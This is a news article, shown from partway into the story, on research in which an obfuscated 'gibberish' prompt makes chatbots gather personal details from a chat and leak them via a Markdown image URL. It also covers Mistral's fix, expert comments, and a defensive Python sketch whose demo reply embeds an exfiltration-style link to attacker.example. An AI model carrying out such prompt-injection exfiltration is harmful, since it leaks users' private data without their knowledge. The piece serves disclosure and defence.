This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats

Mohamed October 18, 2024


The researchers say that if the attack were carried out in the real world, people could be socially engineered into believing the unintelligible prompt might do something useful, such as improve their CV. The researchers point to numerous websites that provide people with prompts they can use. They tested the attack by uploading a CV to conversations with chatbots, and the attack was able to return the personal information contained within the file.

Earlence Fernandes, an assistant professor at UCSD who was involved in the work, says the attack approach is fairly complicated, as the obfuscated prompt needs to identify personal information, form a working URL, apply Markdown syntax, and not give away to the user that it is behaving nefariously. Fernandes likens the attack to malware, citing its ability to perform functions and behave in ways the user might not intend.

“Normally you could write a lot of computer code to do this in traditional malware,” Fernandes says. “But here I think the cool thing is all of that can be embodied in this relatively short gibberish prompt.”

A spokesperson for Mistral AI says the company welcomes security researchers helping it to make its products safer for users. “Following this feedback, Mistral AI promptly implemented the proper remediation to fix the situation,” the spokesperson says. The company treated the issue as one with “medium severity,” and its fix stops the Markdown renderer from calling an external URL through this process, meaning external image loading isn’t possible.
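To make that kind of mitigation concrete, here is a minimal Python sketch of one way a chat interface could drop Markdown images that point at external hosts before rendering a model's reply. It is an illustration only, not Mistral AI's actual fix: the function name `strip_external_images`, the allowlist `ALLOWED_IMAGE_HOSTS`, and the host `cdn.example.com` are all hypothetical. The pattern handles only inline images of the form `![alt](url)`, so reference-style images, raw HTML, and URLs containing parentheses would need separate handling.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the chat UI is permitted to load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Matches inline Markdown images such as ![alt](url) or ![alt](url "title").
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")


def strip_external_images(markdown_text: str) -> str:
    """Replace inline images whose host is not allowlisted with a text marker."""

    def replace(match: re.Match) -> str:
        alt_text, url = match.group(1), match.group(2)
        host = urlparse(url).hostname  # None for relative or malformed URLs
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep allowlisted images untouched
        # Anything else is dropped, so the renderer never requests the URL.
        return f"[image removed: {alt_text}]" if alt_text else "[image removed]"

    return IMAGE_PATTERN.sub(replace, markdown_text)


if __name__ == "__main__":
    reply = "Here is your CV. ![a](https://attacker.example/q?name=Jane%20Doe)"
    print(strip_external_images(reply))
```

An allowlist is used here rather than a blocklist because an attacker can register new domains freely; anything not explicitly trusted, including relative URLs, is replaced with a plain-text marker.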

Fernandes believes Mistral AI’s update is likely one of the first times an adversarial prompt example has led to an LLM product being fixed, rather than the attack being stopped by filtering out the prompt. However, he says, limiting the capabilities of LLM agents could be “counterproductive” in the long run.

Meanwhile, a statement from the creators of ChatGLM says the company has security measures in place to help with user privacy. “Our model is secure, and we have always placed a high priority on model security and privacy protection,” the statement says. “By open-sourcing our model, we aim to leverage the power of the open-source community to better inspect and scrutinize all aspects of these models’ capabilities, including their security.”

A “High-Risk Activity”

Dan McInerney, the lead threat researcher at security company Protect AI, says the Imprompter paper “releases an algorithm for automatically creating prompts that can be used in prompt injection to do various exploitations, like PII exfiltration, image misclassification, or malicious use of tools the LLM agent can access.” While many of the attack types within the research may be similar to previous methods, McInerney says, the algorithm ties them together. “This is more along the lines of improving automated LLM attacks than undiscovered threat surfaces in them.”

However, he adds that as LLM agents become more commonly used and people give them more authority to take actions on their behalf, the scope for attacks against them increases. “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing prior to deployment,” McInerney says.

For companies, that means understanding the ways an AI agent can interact with data and how those interactions can be abused. For individuals, the guidance mirrors common security advice: consider just how much information you’re providing to any AI application or company, and if you use prompts from the internet, be cautious of where they come from.
